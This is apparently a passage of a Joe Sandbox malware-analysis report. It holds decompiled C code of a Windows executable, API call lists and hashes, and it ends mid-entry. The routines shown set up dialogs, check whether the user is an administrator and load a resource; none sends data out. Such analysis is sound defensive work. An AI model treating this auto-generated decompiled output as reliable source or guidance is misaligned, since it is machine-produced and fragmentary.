                                                                                                                                                                                                      0x00a63151
                                                                                                                                                                                                      0x00a63158
                                                                                                                                                                                                      0x00a6316a
                                                                                                                                                                                                      0x00a63176
                                                                                                                                                                                                      0x00a6317d
                                                                                                                                                                                                      0x00a6318b
                                                                                                                                                                                                      0x00a6319e
                                                                                                                                                                                                      0x00a631a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a631ad
                                                                                                                                                                                                      0x00a63120
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6312a
                                                                                                                                                                                                      0x00a63134
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63134
                                                                                                                                                                                                      0x00a6312c
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A6313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A6314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00A6316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A63176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00A6317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 00A63185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00A63190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00A630C0), ref: 00A631A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A631CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: 7c3c4cd01a85b570d659bfcd13d93d43fa7d5644147edfd64b5308d4b6ce9858
                                                                                                                                                                                                      • Instruction ID: e442be7dd5027a65c644502e423a3b38724abd302e06c3a7f7e2cc4ab62cd9eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c3c4cd01a85b570d659bfcd13d93d43fa7d5644147edfd64b5308d4b6ce9858
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C118132644251BBEF11DFA49C0CB9A3A78FB5B721F100711F926A51E0DBF59A43CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E00A618A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xa68128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E00A66CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00A617EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xa68128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa68128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a618a3
                                                                                                                                                                                                      0x00a618a3
                                                                                                                                                                                                      0x00a618ab
                                                                                                                                                                                                      0x00a618b2
                                                                                                                                                                                                      0x00a618b5
                                                                                                                                                                                                      0x00a618be
                                                                                                                                                                                                      0x00a618c0
                                                                                                                                                                                                      0x00a618c6
                                                                                                                                                                                                      0x00a618c7
                                                                                                                                                                                                      0x00a618ca
                                                                                                                                                                                                      0x00a618cf
                                                                                                                                                                                                      0x00a619c9
                                                                                                                                                                                                      0x00a619d8
                                                                                                                                                                                                      0x00a619d8
                                                                                                                                                                                                      0x00a618df
                                                                                                                                                                                                      0x00a619b8
                                                                                                                                                                                                      0x00a619bd
                                                                                                                                                                                                      0x00a619bf
                                                                                                                                                                                                      0x00a619bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a619bd
                                                                                                                                                                                                      0x00a618fa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61912
                                                                                                                                                                                                      0x00a619aa
                                                                                                                                                                                                      0x00a619ad
                                                                                                                                                                                                      0x00a619b3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61927
                                                                                                                                                                                                      0x00a61927
                                                                                                                                                                                                      0x00a61932
                                                                                                                                                                                                      0x00a61936
                                                                                                                                                                                                      0x00a619a9
                                                                                                                                                                                                      0x00a619a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a619a9
                                                                                                                                                                                                      0x00a6194c
                                                                                                                                                                                                      0x00a619a2
                                                                                                                                                                                                      0x00a619a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6196e
                                                                                                                                                                                                      0x00a61970
                                                                                                                                                                                                      0x00a61999
                                                                                                                                                                                                      0x00a6199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6199c
                                                                                                                                                                                                      0x00a61972
                                                                                                                                                                                                      0x00a61972
                                                                                                                                                                                                      0x00a61975
                                                                                                                                                                                                      0x00a61984
                                                                                                                                                                                                      0x00a61985
                                                                                                                                                                                                      0x00a6198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6198c
                                                                                                                                                                                                      0x00a61991
                                                                                                                                                                                                      0x00a61996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61996
                                                                                                                                                                                                      0x00a6194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A618DD), ref: 00A6181A
                                                                                                                                                                                                        • Part of subcall function 00A617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A6182C
                                                                                                                                                                                                        • Part of subcall function 00A617EE: AllocateAndInitializeSid.ADVAPI32(00A618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A618DD), ref: 00A61855
                                                                                                                                                                                                        • Part of subcall function 00A617EE: FreeSid.ADVAPI32(?,?,?,?,00A618DD), ref: 00A61883
                                                                                                                                                                                                        • Part of subcall function 00A617EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A618DD), ref: 00A6188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A618EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A618F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A6190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A61918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A6192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A61944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A61964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00A6197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00A6199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00A619A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A619AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: 9b560a3160c124a03383caa89a3f11ab446a9328f201284af2535918a4cbfba5
                                                                                                                                                                                                      • Instruction ID: dfb234c96ad70649ebc742448edec53d58968b24b876fdaca9e935aa476f1245
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b560a3160c124a03383caa89a3f11ab446a9328f201284af2535918a4cbfba5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7312A72A00209AFDB20DFE5DC98AAFBFBCFF14704F140529E645E2160DB759946CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A6468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00a64699
                                                                                                                                                                                                      0x00a6469b
                                                                                                                                                                                                      0x00a646a9
                                                                                                                                                                                                      0x00a646af
                                                                                                                                                                                                      0x00a646b4
                                                                                                                                                                                                      0x00a646bc
                                                                                                                                                                                                      0x00a646f9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a646f9
                                                                                                                                                                                                      0x00a646d9
                                                                                                                                                                                                      0x00a646dd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a646e5
                                                                                                                                                                                                      0x00a646ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a646f5
                                                                                                                                                                                                      0x00a646ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: cb4aecd85523ac7084c0bc43d07146538440ce2c3b54c032dc531dd79023adca
                                                                                                                                                                                                      • Instruction ID: bec952571145b318d38db9b3718bb3df9c2777fc58d06b24fabae3523ca79b18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb4aecd85523ac7084c0bc43d07146538440ce2c3b54c032dc531dd79023adca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA01A9362442107BE3505BE5AC4DF6B7E3DEBDAF51F050414FA4AA7150C9F18C428BB6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E00A617EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xa6a288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00a617f6
                                                                                                                                                                                                      0x00a617fd
                                                                                                                                                                                                      0x00a61805
                                                                                                                                                                                                      0x00a6180b
                                                                                                                                                                                                      0x00a6180d
                                                                                                                                                                                                      0x00a61815
                                                                                                                                                                                                      0x00a61818
                                                                                                                                                                                                      0x00a61820
                                                                                                                                                                                                      0x00a61824
                                                                                                                                                                                                      0x00a6182c
                                                                                                                                                                                                      0x00a61832
                                                                                                                                                                                                      0x00a61837
                                                                                                                                                                                                      0x00a61851
                                                                                                                                                                                                      0x00a61854
                                                                                                                                                                                                      0x00a6185d
                                                                                                                                                                                                      0x00a61862
                                                                                                                                                                                                      0x00a6186c
                                                                                                                                                                                                      0x00a61872
                                                                                                                                                                                                      0x00a61877
                                                                                                                                                                                                      0x00a6187e
                                                                                                                                                                                                      0x00a6187e
                                                                                                                                                                                                      0x00a61883
                                                                                                                                                                                                      0x00a61883
                                                                                                                                                                                                      0x00a6185d
                                                                                                                                                                                                      0x00a6188a
                                                                                                                                                                                                      0x00a6188a
                                                                                                                                                                                                      0x00a618a2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A618DD), ref: 00A6181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A6182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00A618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A618DD), ref: 00A61855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,00A618DD), ref: 00A61883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A618DD), ref: 00A6188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 61d5eb7996d472bc0978a9443ba8c2569ec3c66a226e2a02ecd3c8bb13a306b6
                                                                                                                                                                                                      • Instruction ID: 6474d3b6efbf7854a8a1086674b8f5f54f2147933eb73f62b57ff5f8dab534a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61d5eb7996d472bc0978a9443ba8c2569ec3c66a226e2a02ecd3c8bb13a306b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71116071E00209ABDB10DFE4DC49ABEBBB8EF48701F150569FA16E3290DA709D058B91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E00A643D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xa69404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa691dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00a63459
                                                                                                                                                                                                      0x00a6345c
                                                                                                                                                                                                      0x00a634d8
                                                                                                                                                                                                      0x00a634de
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a634e0
                                                                                                                                                                                                      0x00a6345e
                                                                                                                                                                                                      0x00a63463
                                                                                                                                                                                                      0x00a6349a
                                                                                                                                                                                                      0x00a634a0
                                                                                                                                                                                                      0x00a634a7
                                                                                                                                                                                                      0x00a634b2
                                                                                                                                                                                                      0x00a634c4
                                                                                                                                                                                                      0x00a634cb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a634cb
                                                                                                                                                                                                      0x00a63468
                                                                                                                                                                                                      0x00a6346e
                                                                                                                                                                                                      0x00a63474
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6347c
                                                                                                                                                                                                      0x00a6348c
                                                                                                                                                                                                      0x00a63490
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63496
                                                                                                                                                                                                      0x00a63484
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63486
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63486
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A63490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A6349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A634B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00A634C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00A634CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00A634D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: be39802b8c3547158c87b17f22d67a2f1cc0b041d8d79213f258ebfb534d54b8
                                                                                                                                                                                                      • Instruction ID: 1c1610c8a95fec94d6caeda6fa235e38048637ab2ffe230b2cf1aecab8ac3741
